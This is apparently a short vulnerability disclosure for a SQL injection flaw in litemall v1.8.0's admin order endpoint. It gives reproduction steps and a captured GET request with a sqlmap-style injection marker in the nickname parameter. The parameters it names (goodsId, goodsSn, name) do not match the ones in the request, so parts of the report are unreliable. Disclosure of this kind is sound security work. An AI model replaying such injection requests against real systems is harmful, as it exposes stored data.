Description
SQL injection vulnerability in linlinjava litemall v.1.8.0 allows a remote attacker to obtain sensitive information via the goodsId, goodsSn, name parameters of the AdminOrderController..java component.
1.Steps to reproduce (复现步骤)
访问商品管理,昵称输入1 ,点击查询,抓取数据包
GET /admin/order/list?page=1&limit=20&nickname=1*&consignee=1&orderSn=1&sort=add_time&order=desc&start=&end= HTTP/1.1 Host: 172.20.10.11:9527 Accept: application/json, text/plain, */* X-Litemall-Admin-Token: 31d38891-ae04-441e-8b2b-7f90371b030e User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36 Referer: http://172.20.10.11:9527/ Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=31d38891-ae04-441e-8b2b-7f90371b030e; X-Litemall-Admin-Token=31d38891-ae04-441e-8b2b-7f90371b030e Connection: close
